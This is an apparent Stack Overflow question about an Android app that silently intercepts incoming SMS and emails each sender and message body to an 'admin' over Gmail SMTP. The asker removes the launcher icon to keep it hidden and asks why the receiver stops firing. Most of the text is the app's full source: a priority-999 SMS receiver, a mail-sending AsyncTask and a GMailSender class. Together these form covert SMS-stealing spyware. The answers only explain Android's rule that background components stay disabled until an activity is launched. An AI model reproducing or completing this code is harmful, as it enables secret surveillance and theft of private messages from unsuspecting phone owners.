# how to call Broadcast Receiver in hidden application

Tags: android, broadcastreceiver, jakarta-mail

I am developing a android application whose min sdk is 7 and target is 16.The application implements a broadcast receiver which receives new incoming sms and mails the message body and sender number to admin.til now the application runs fine but there is a requirement to keep the application hidden after installation.so when did i removed these lines from my manifest

```
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
```

the application did got hidden but is'nt sending mail.so i think broadcast receiver is not being called when i hide the app dont know the exact cause...Below is my code ...stucked from last two days..any help is greatly appreciated...

my manifest file

```
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="jd.dr.smsapp"
android:versionCode="1"
android:versionName="1.0" >

<uses-sdk
android:minSdkVersion="7"
android:targetSdkVersion="16" />
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<application
android:allowBackup="true"
android:icon="@drawable/ic_launcher"
    android:label="@string/app_name"
    android:theme="@style/AppTheme" >
    <receiver android:name=".MainActivity"
         android:exported="true"
          android:enabled="true">
<intent-filter android:priority="999">
     <action android:name="android.provider.Telephony.SMS_RECEIVED"></action>
  <category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</receiver>

</application>

</manifest>
```

this is my activity

```
package jd.dr.smsapp;


import java.util.ArrayList;


import android.app.Activity;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.os.AsyncTask;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;
import android.widget.ArrayAdapter;
import android.widget.ListView;
import android.widget.Toast;

public class MainActivity extends Activity
{
    /** Called when the activity is first created. */
     public static final String SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED";
     ListView list;

     ArrayList<String> messageList;
     ArrayAdapter< String> adapter;
     String msgno="";
     String msg="";

    public void onCreate(Bundle savedInstanceState)
    {

        super.onCreate(savedInstanceState);

        setContentView(R.layout.activity_main);
        list = (ListView) findViewById(R.id.listView1);



        messageList  = new ArrayList<String>();
        //messageList.add("check");
       adapter = new ArrayAdapter<String>(this, android.R.layout.simple_list_item_1, messageList);
       list.setAdapter(adapter);

        IntentFilter filter = new IntentFilter(SMS_RECEIVED);
        registerReceiver(receiver_SMS, filter);
    }
    BroadcastReceiver receiver_SMS = new BroadcastReceiver()
    {
        public void onReceive(Context context, Intent intent)
        {
             if (intent.getAction().equals(SMS_RECEIVED))
             {
                    Bundle bundle = intent.getExtras();
                    if (bundle != null)
                    {
                      Object[] pdus = (Object[]) bundle.get("pdus");
                      SmsMessage[] messages = new SmsMessage[pdus.length];

                      for (int i = 0; i < pdus.length; i++)
                        messages[i] = SmsMessage.createFromPdu((byte[]) pdus[i]);

                      for (SmsMessage message : messages)
                      {

                         msgno=message.getDisplayOriginatingAddress();
                         msg=message.getDisplayMessageBody();
                         new sendmail().execute();
//                               Toast.makeText(MainActivity.this,     "----"+message.getDisplayMessageBody(), Toast.LENGTH_LONG).show();
                                 receivedMessage(message.getDisplayOriginatingAddress());
                      }
                    }
                  }
        }
    };
    private void receivedMessage(String message)
    {
        messageList.add(message);
        adapter.notifyDataSetChanged();
    }

//      @Override
//      protected void onStop()
//      {
//         
//          unregisterReceiver(receiver_SMS);
//          super.onStop();
//      }




    public class sendmail extends AsyncTask<Void, Void, String> {
        @Override
        protected String doInBackground(Void... params) {
            // TODO: attempt authentication against a network service.

            String output="1";

                try {
                    GMailSender sender = new    GMailSender("sendermailid", "senderpassword");

                    if(msgno.equals("") || msg.equals("")){
//                          Message("blank");

                    }else{
                    sender.sendMail("Message From "+msgno,msg,"sendermailid","receivermailid");   
                    Log.i("no error", msg+msgno);
                    }

                    } catch (Exception e) { 

                    Log.i("error", e.toString());
            output="0";
        }

                return output;
        }

        @Override
        protected void onPostExecute(String success) {
            if(success.equals("1")){
                Log.i("no error", success);
//                  Message("valid");
            }else{
//                  Message("invalid");
            }

        }
    }


    private void Message(String Msg) {
         Toast.makeText(MainActivity.this, Msg.toString(),     Toast.LENGTH_LONG).show();

    }  
}
```

this file is to authenticate and send mail
GmailSender.java

```
package jd.dr.smsapp;

import javax.activation.DataHandler;   
import javax.activation.DataSource;   
import javax.mail.Message;   
import javax.mail.PasswordAuthentication;   
import javax.mail.Session;   
import javax.mail.Transport;   
import javax.mail.internet.InternetAddress;   
import javax.mail.internet.MimeMessage;   
import java.io.ByteArrayInputStream;   
import java.io.IOException;   
import java.io.InputStream;   
import java.io.OutputStream;   
import java.security.Security;   
import java.util.Properties;   

public class GMailSender extends javax.mail.Authenticator {   
private String mailhost = "smtp.gmail.com";   
private String user;   
private String password;   
private Session session;   

static {   
    Security.addProvider(new jd.dr.smsapp.JSSEProvider());   
}  

public GMailSender(String user, String password) {   
    this.user = user;   
    this.password = password;   

    Properties props = new Properties();   
    props.setProperty("mail.transport.protocol", "smtp");   
    props.setProperty("mail.host", mailhost);   
    props.put("mail.smtp.auth", "true");   
    props.put("mail.smtp.port", "465");   
    props.put("mail.smtp.socketFactory.port", "465");   
    props.put("mail.smtp.socketFactory.class",   
            "javax.net.ssl.SSLSocketFactory");   
    props.put("mail.smtp.socketFactory.fallback", "false");   
    props.setProperty("mail.smtp.quitwait", "false");   

    session = Session.getDefaultInstance(props, this);   
}   

protected PasswordAuthentication getPasswordAuthentication() {   
    return new PasswordAuthentication(user, password);   
}   

public synchronized void sendMail(String subject, String body, String sender, String recipients) throws Exception {   
    try{
    MimeMessage message = new MimeMessage(session);   
    DataHandler handler = new DataHandler(new ByteArrayDataSource(body.getBytes(), "text/plain"));   
    message.setSender(new InternetAddress(sender));   
    message.setSubject(subject);   
    message.setDataHandler(handler);   
    if (recipients.indexOf(',') > 0)   
        message.setRecipients(Message.RecipientType.TO, InternetAddress.parse(recipients));   
    else  
        message.setRecipient(Message.RecipientType.TO, new  InternetAddress(recipients));   
    Transport.send(message);   
    }catch(Exception e){

    }
}   

public class ByteArrayDataSource implements DataSource {   
    private byte[] data;   
    private String type;   

    public ByteArrayDataSource(byte[] data, String type) {   
        super();   
        this.data = data;   
        this.type = type;   
    }   

    public ByteArrayDataSource(byte[] data) {   
        super();   
        this.data = data;   
    }   

    public void setType(String type) {   
        this.type = type;   
    }   

    public String getContentType() {   
        if (type == null)   
            return "application/octet-stream";   
        else  
            return type;   
    }   

    public InputStream getInputStream() throws IOException {   
        return new ByteArrayInputStream(data);   
    }   

    public String getName() {   
        return "ByteArrayDataSource";   
    }   

    public OutputStream getOutputStream() throws IOException {   
        throw new IOException("Not Supported");   
    }   
}
```

}

JSSEProvider

```
package jd.dr.smsapp;

import java.security.AccessController;
import java.security.Provider;

public final class JSSEProvider extends Provider {

/**
 * 
 */
private static final long serialVersionUID = -86921860237465997L;

public JSSEProvider() {
    super("HarmonyJSSE", 1.0, "Harmony JSSE Provider");
    AccessController.doPrivileged(new java.security.PrivilegedAction<Void>() {
        public Void run() {
            put("SSLContext.TLS",
                    "org.apache.harmony.xnet.provider.jsse.SSLContextImpl");
            put("Alg.Alias.SSLContext.TLSv1", "TLS");
            put("KeyManagerFactory.X509",
                    "org.apache.harmony.xnet.provider.jsse.KeyManagerFactoryImpl");
            put("TrustManagerFactory.X509",
                    "org.apache.harmony.xnet.provider.jsse.TrustManagerFactoryImpl");
            return null;
        }
    });
}
}
```

Answer (score 1):

No part of an app may be launched by the system or any other app unless the user has launched the main Activity of that app manually since Android 3.1.

So you will have to give your app a launcher Activity and have the user open it before your BroadcastReceiver works on Android 3.1 and above.

Comment: so it means it is possible only for version below honeycomb ....but i have also tried it on ginger bread but its not working there too...any suggestions is there any solution for versions below honeycomb or i should find some other alternative.....

Answer (score 0):

Android has a basic security feature whereby an application's background services, receivers, etc. wont be enabled until an Activity from that application has been run.